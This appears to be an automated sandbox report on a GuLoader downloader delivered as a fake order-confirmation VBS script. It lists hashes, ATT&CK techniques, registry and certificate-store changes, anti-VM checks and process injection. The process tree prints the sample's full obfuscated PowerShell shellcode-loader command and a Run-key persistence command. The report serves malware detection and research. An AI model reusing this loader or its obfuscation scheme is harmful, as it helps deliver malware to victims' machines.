guloader | a445f0c017c1ba67b329b2e26c5826b6bd3ad019c4d17b644d174f3625f453b0

General

Target

答复 CONFIRMATION OF ORDER.vbs
Size

654KB
MD5

c27f7a38b0661de03b69afe76b9697f4
SHA1

36fea8822c1b4d33b405c2ab16423ea6c2a02736
SHA256

d27c6afe237a969751b1e44c98fcd78f93623816162ac349703e9f3f39e542d1
SHA512

56dcc44ac0b0dfcc076cec07eef693928903992cc80fdb0942068dca59f69a0cc6baa3370f3fa9b2865e47f3540de15bd284ae396e42b25421ca57eda5b1f8b2
SSDEEP

12288:1ctF/y6uBCMyplUUb4eK9hjS1cpeMpWKLHFPwC9kxXKxMj3:1v6i0lPLYhW9aLHFPoZKxMj3

Score

10^/10

guloader downloader persistence

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
Blocklisted process makes network request 1 IoCs

Processes:

WScript.exe

flow pid process

12 2152 WScript.exe

flow	pid	process
12	2152	WScript.exe

Checks QEMU agent file 2 TTPs 2 IoCs

Checks presence of QEMU agent, possibly to detect virtualization.

Query Registry

T1012

System Information Discovery

T1082

Processes:

powershell.exeieinstal.exe

description	ioc	process
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	powershell.exe
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	ieinstal.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	WScript.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

ieinstal.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Windows\CurrentVersion\Run	ieinstal.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Radialization = "%Vop8% -w 1 $Farvedatabaser=(Get-ItemProperty -Path 'HKCU:\\SOFTWARE\\AppDataLow\\').Slaginstrumenternes;%Vop8% $Farvedatabaser"	ieinstal.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exeieinstal.exe

pid process

4972 powershell.exe
2924 ieinstal.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 4972 set thread context of 2924 4972 powershell.exe ieinstal.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

pid	process
4972	powershell.exe
2924	ieinstal.exe

description	pid	process	target process
PID 4972 set thread context of 2924	4972	powershell.exe	ieinstal.exe

Modifies system certificate store 2 TTPs 5 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

WScript.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	WScript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	WScript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	WScript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	WScript.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exe

pid process

4972 powershell.exe
4972 powershell.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

4972 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 4972 powershell.exe

pid	process
4972	powershell.exe
4972	powershell.exe

pid	process
4972	powershell.exe

description	pid	process
Token: SeDebugPrivilege	4972	powershell.exe

Suspicious use of WriteProcessMemory 13 IoCs

Processes:

WScript.exepowershell.execsc.exe

description	pid	process	target process
PID 2152 wrote to memory of 4972	2152	WScript.exe	powershell.exe
PID 2152 wrote to memory of 4972	2152	WScript.exe	powershell.exe
PID 2152 wrote to memory of 4972	2152	WScript.exe	powershell.exe
PID 4972 wrote to memory of 4344	4972	powershell.exe	csc.exe
PID 4972 wrote to memory of 4344	4972	powershell.exe	csc.exe
PID 4972 wrote to memory of 4344	4972	powershell.exe	csc.exe
PID 4344 wrote to memory of 3716	4344	csc.exe	cvtres.exe
PID 4344 wrote to memory of 3716	4344	csc.exe	cvtres.exe
PID 4344 wrote to memory of 3716	4344	csc.exe	cvtres.exe
PID 4972 wrote to memory of 2924	4972	powershell.exe	ieinstal.exe
PID 4972 wrote to memory of 2924	4972	powershell.exe	ieinstal.exe
PID 4972 wrote to memory of 2924	4972	powershell.exe	ieinstal.exe
PID 4972 wrote to memory of 2924	4972	powershell.exe	ieinstal.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\答复 CONFIRMATION OF ORDER.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:2152

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$Admiral = """FlutiACowordProlodZoody-FortoTUnhepyPythipDexteeHande Sable-MelleTBattlyEvalupdobbeeLemmuDTopareindowfArbejiichthnFrakriEpenctUblu iFilopoSennenEsthe Indst'TavleurosmasPart iUndernBrandgGstep AuscuSFocusyMikrosNordltLuceneBrevsmTenor;kaempuSincisUligeiHaandnKendsgBogha ForhaSSpindySmagssExtirtPletveSilicmSoodl.ReperRAmmonuDinginRissktFjedeiuteromKkkeneBelav.kajakItestdnOmladtAubrieUnsymrAlbueoChillpStandSLawcreUnsqurQuainvRomboiSkalacReunfeManifsBredb;AustrpSubstuCountbNavlelRangsisedlecWaage VimplsSvendtmilieaCautettelefiDeposcMatth festlcIndkrlScrunaCaphasPlsessParti RevotAcogitfEvaposepiteiHexionSlangdUnwre1Nonde Haand{Satir[ReparDVoldtlPumpmlAntinILovewmTravepAtriuoNonkorindvatStorm(Sport`"""OrgankfemhueAutorrCymblnRemuteIra FlTrick3there2Negle`"""uforu)Angui]prebepEkstruOverrbAtomslImmeriForflcAntin ForsrsShacktKildnaZinnitGodstiErlggcSinds TwinaeAfgrdxPhilotJdekaeSnigerKlagenOmsti KaoliiColopnllebrtGhior MountOArbejpPteroeForumnFantoMTraliuEftertOversePaaklxQuini(DivaniSculpnAfsketAlbum AntetNBolesoKompoeSprogrSerperNitro,KereniTearonpostbtSurfm UdrenOAnemavSulkeesubpe,DuodeiGlsninGrandtHasse RsonnQHeptooinkarpScriphDeles)Lynsn;Conep[BitelDBesttlProvelProcyIHeliomPettipTantioGyptorRigsrtEquin(Snesc`"""VolutwRekyliInfornOmnipmRivebmLobel.dignidKeepslSkamllTvrvi`"""Autok)Klint]SwamppDiplouEgoisbOutbilArvediAppelcTrof GaveksKepaltBloodaUnspetsttteiTolvmcGlauc PleiseCampoxOverfttrolleSeriorUncrunAmphi GonokiEnternGermatDecim MonolwOverdaIdealvIsothePolarOperiouTripttfestsGbrasseMskentsamflDSpaameProduvErstaCNiffeaShadopPrayesSkovs(OrthoiPapisnskaertFresi NicotRExoteeRepagiAlfrinTaage,KonsuiSkiftnKassetKdebr BlotcSSlickpbiotorMarkj,matriiNephrnBerbetSkkes KeltyDImbibaSammehNauselAfsavyHolle)Sport;Irreg[eutelDFootelAmbaglKonomISubtimLngdepAlleroProterNighttNonmo(Grape`"""AutenkUnknoeDebonrMilpanEftereSlvholHypso3Bulni2Hatte`"""Virke)Denot]TredipRozetuflersbLgebolBlowbiSmaabcOvers TravesTalevtInstraGeneatBrainiKendecbedri ProdueSkandxBortltpalameUudtarOmhannUnvor UnmariSystenRefuntBocci opildMCarefuHeighlSoftwDMidesiIndvvvFoste(JapygiAspernrehabtMollu InfluSHelbraFllesvNdigevIndskigryde,HandeiSynopnimpertTses EarfusUnruevSaddeaAndrolGlose,sliddiLarynnBulchtEnsar AppelTParagyAgnoenPredoeMatad)Unpro;Sord [IntreDCatarlrevomlWantoIGoddimNettopchurcoBlissrOctyltOrgan(pansy`"""SulphAToothDPressVeunikAUdbinPUnsolIGhane3Klari2Beowu.FulfiDLargiLSerieLsympa`"""Check)uncyn]PlenupcapsouMaligbUnviclValutiSpndvcOttaw RetirsSkrmttNecesaSkuritemneriMannecArmlo lianeePrebexMorbrtHistoeBruncrFlugtnFinde GenneiBeskanTtpaktSpide CetanGPasfoeJustitAppliSHah ReBesterFlawsvGarloiCorelcHexamePensiDPigeniBefolsLimitpGalealKatteaApandyFlageNDetleaAntismDouzaeCyano(RequiiLysfonVandrtTrito revanSLvtr hEpopjedziggiCodrukKalmu,PanioiAlcohnCannotdisoz AntonRIndsaeNonpeaTudse,UnweaiVerbinPhototDicat AfrogFSvindeWeathtAvioniFormycsuperhKultu,NephiiUltranFttertAfter StangBmeedlrSbefauLimb )Forma;Hvoru[AaremDSkilllGastrlDanesIDits mAntimpUnpenoOrdrerAvlintDroph(Stent`"""HardwkNedvreSkrivrErhvenPoddieBiblilSkaer3Agarw2Rehid`"""Fight)Saaga]SikkepSrgetuJernbbTimeblPrepriTamsvcScudd SallisBrndvtCerioafuromtLretiiDrakocskywr TipsseRedepxRecrutReagieasgerrMahatnBrebl InfuriSkydenSmushtVizie AadriVUnburiPretortrkistmerceuUnrepaRetinlKonspAPay WlHematlLavtloUntedcDelgg(UnstiidissinIllustBlufr herbsvUnsic1Provo,UnvaliPoisinInfertSnubp Indrovcorri2Katal,burdeiEpitanUdstrtGldes DisarvPibek3Ensky,TurfiiPunktnDuteotSavkl NyorivUdsan4Puffe)Indus;Overl[AldohDHjemmlLobstlPrintIjazzgmCrockpElectoOmskrrFortitAnnul(Corri`"""hylobkLp DeeRebstrWestmnAbscieTrepalFootw3Stafe2Forsk`"""Anepi)Dumai]AfforpAmperuUmodnbSlumblLynsniTrypacGersh skftesSatsatMuldzaAntictMimikiViljecMicro OchryeKraefxLassitTelemeCookhrPopednForvr StewavUniatoBaliniAcetadMccab TeletENaturxArmeriSphectXylogPDensirTasteoFormacArchiePreadssulfisCresc(ModiciHaemonSkrivtArkan CyaneGFupmorKvatosIsogavBebyraChumpmTuber)Panor;mooed[ClimaDAberdlmattilAlminIFarvemwergipPreinoTrimerSociottotal(Glove`"""CinnakimproeSjlesrBllednSmidgeEquiplShamp3Revol2Cross`"""Polys)Clair]pectipSmreguPleiobOpgralStarviImbescaflok ProgrsTranstBeramaTravetheathiBgretcInfor FjernePolypxFootntCholeeBasoprJama nPostc GeninIBoghanFarewtpluriPFrekvtOlymprFritu ExtinEKosmenMeniguFangymappliSSecreySjlebsCounttAfkaseGrundmBiancLPilheoViniecMandeaOverilundereCannosBekmpAMenin(ReaktuBeggiiVoldgnReklatUmedd SkvalvWater1Paleh,BarreiSyntanPlanltGyder StitevOppos2Archs)Vilde;Baill}Boreh'Randa;Slich`$LoupsADiakofBrkvesInheriCuartnUngandUnmor3Revol=Penis[AgeneASinapfKandisMissiiNewzenThio dErgs 1Situa]buckr:Kyrin:AktieVMagneiMulserMetaltBeatguUndebaPhotolunsupARallelIngenlMisaroGalmacMisle(Spado0Stemm,Acetu1Forty0Tilsi4Afvis8Mishn5Undst7Strad6Bilfr,Forra1erhve2Arabi2Knyst8konve8Srtry,Ekste6Apart4Gabes)Oplgn;Centr`$BjrgeaMurdermolasgHovedyOrigirDimenoCentrsvret eMarli=Blind(KubikGBogeneYo AstHulle-HarmoIlbenutMartieBlindmGelatPkrydsrUdklkoTorvipBilleeStansrEnakttSorniyUncon Resol-MuehlPIntraaSnupttPolemhAsymm Bortd'HasleHCendyKHovedCSoothUGentl:Comme\HawthSForhaoLavatfTillitBetjewSundhaTitlirselvueAutof\udsknFreligoCentrrInkamsOutbuaCenognPterogCovereLactirWeebl'Latos)Sludr.NivelMdommeeOmdeltCrabbrAfsvkiCleiscrieveiUdtvrzStunseDonnysUlveh;Kapru`$JibbeAundercPannecIndebiOpfrepYird iBondetLaudarSelenaRestilPseud2Sydne1Valua7neddy Admir=Victo motor[StammSPiggeyMytersShauctLineceTonyamSepsi.WundtCForlaoContenupletvEvasieUnderrModeltUndsi]iagtt:Coyny:mytolFSerolrAutogoManifmVideoBSnowiaAccursFrateeFroma6Muggi4CaamaSDurittBiomarCowryiFarmsnBortkgBankg(Roten`$TjeneaMonoprGennegHilsnyerhveritalioFngsesDiskueSubjo)Noble;Epite[dayflSUndecyFenersdiffetPrintefringmKines.IrrigRHeruduTestknAccretLedniiTimormRegnseDesmo.PericITilhrnHalsrtPromoeuforgrGs GeoPusilpbohavSBrinkenickyrArthrvErectiPerikcTimideAddicsNikas.cereaMYdet aLetlirPunktsBeddihKraveaBderelinter]Bemge:Lmlen:FreudCStorroMedivpBetydyEnkel(Optje`$acclaAUnatocPhallcKinkaihjlpepProgriGammetGallerFormeaBefoolBegyn2Bedew1Short7neigh,Stifi Ledsa0Absen,Brneb Rykke Gigli`$CospeASalutfLdstesSkoseiNonsynNynazdPubli3Toupe,Miste Nitro`$PsykoAHypnocBengtcMynheiClaimpKunzsiBorestMenacrMacroaRituelKoger2Alter1Reloc7genop.TryklcBrainoTentiuXanthnSeaqutHacky)Lnene;Ephra[SluicALazylfBlamesFrostiCelannSpidsdPerir1Skygg]Navbr:Infer:RoselEBarndnMetasuTrbukmcountSSuperyFluorsOrdfotThyrieMistrmSelvvLUnsynoTykhucRutsjaPhagolAralieReconsBjerrAVandb(Afvan`$BrandARelokftmrersTrykkiLegernAnathdTrave3Klini,Nonte Splen0Bades)Parav#Saksk;""";Function Afsind4 { param([String]$HS); For($i=5; $i -lt $HS.Length-1; $i+=(5+1)){ $Verdour = $Verdour + $HS.Substring($i, 1); } $Verdour;}$Koldtvandsrrets0 = Afsind4 'KroneIRappoEOpvarXamtsk ';$Koldtvandsrrets1= Afsind4 $Admiral;& ($Koldtvandsrrets0) $Koldtvandsrrets1;;"
2⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4972

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4lq3nklh\4lq3nklh.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
PID:4344

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA6B0.tmp" "c:\Users\Admin\AppData\Local\Temp\4lq3nklh\CSC855BAB5A8BA42A88BF7569A5DBC88AF.TMP"
4⤵
PID:3716

C:\Program Files (x86)\internet explorer\ieinstal.exe
"C:\Program Files (x86)\internet explorer\ieinstal.exe"
3⤵
- Checks QEMU agent file
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2924

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Install Root Certificate

Modify Registry

Web Service

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

3

T1082

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\4lq3nklh\4lq3nklh.dll

Filesize
3KB

MD5
df42d35c1441d60badf9c65f1c24cec1

SHA1
336035f18833ea61b731b4decfa5b348657efbe9

SHA256
8756241209873a83e4c48b03ce56a183e71fc9a8410b12e00fc903f3dce43324

SHA512
fcb060caad4c0c85fca7a6f590d8c796eecdfba6ceea8edff51671ac06695deb94332dbd7417b0a135f15e0c287bbe8638157c28cfb2fd4aa3ea3335ae217efe

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESA6B0.tmp

Filesize
1KB

MD5
a601c1cd39e68ffb741b6338c235570e

SHA1
90d1ba37fbb21ccc14feb981a54f7c6da758b2c2

SHA256
8f62dd68d16b85af00c89a3bd567885b101759c8e845e86fac408bcf9a22cfbb

SHA512
f46eff43d3016780fcf099a6e2d9c20d9d3f87715595257c42a8611c0b263c1aecd1fa7ac578d500a8041e4d4f63df54fb237eaa64796d9ccc3ac7bf7aef0416

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4lq3nklh\4lq3nklh.0.cs

Filesize
709B

MD5
399d074ed20a2e3ab603cab554f0be01

SHA1
1583c3cc0c5c8ec0ecce716378f447c54e0fd2ce

SHA256
31fc743394290f87bd6b3b282e8cd3faba09f0501a4a4e940d85a233889b089d

SHA512
635d9107e5e5540e6de6b3f3f98983143d50c6cf1329c508b9bd244f51204f219a7930f5cb23ee760407cd5249295fac69ba53e5cc1e3122fb5ea62f27b508ec

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4lq3nklh\4lq3nklh.cmdline

Filesize
369B

MD5
a4901f95ceff9a88de443effc77b3dcc

SHA1
e08387e1b41b6088ac23f1542c7c253decf336a1

SHA256
c49e23c01d52518aaf22d5238b2c5ac65c055c34b69845d360a64d45197567ea

SHA512
